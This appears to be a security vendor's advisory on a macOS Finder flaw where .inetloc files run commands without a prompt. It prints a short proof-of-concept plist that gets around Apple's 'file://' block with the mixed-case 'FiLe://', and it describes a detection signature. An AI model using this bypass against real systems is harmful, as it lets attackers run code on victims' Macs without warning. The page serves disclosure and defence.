Apple macOS Finder - Remote Command Execution


Description

The Finder app in macOS is a gateway to all of the files, apps and downloads on a Mac.


Vulnerability

An independent security researcher, Park Minchan has discovered a vulnerability in macOS Finder which allows .inetloc files to execute arbitrary commands. An attacker can run any commands embedded in an .inetloc file without any warnings or prompts.


Identification

The proof of concept code shows the contents of a .inetloc file that can be used to exploit this vulnerability. Newer versions of macOS, from Big Sur onwards have blocked "file://" but they failed to consider upper and lower case variations.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
  </dict>
</plist>


Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to exploit this vulnerability to execute arbitriary commands.


Coverage

Idappcom has created signature 8021815 along with a traffic file.


References

SSD Advisory – macOSFinder RCE

Hacker News - Unpatched High-Severity Vulnerability Affects Apple macOS Computers


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can test your defences and report any issues. Learn more here https://www.idappcom.co.uk/traffic-iq-professional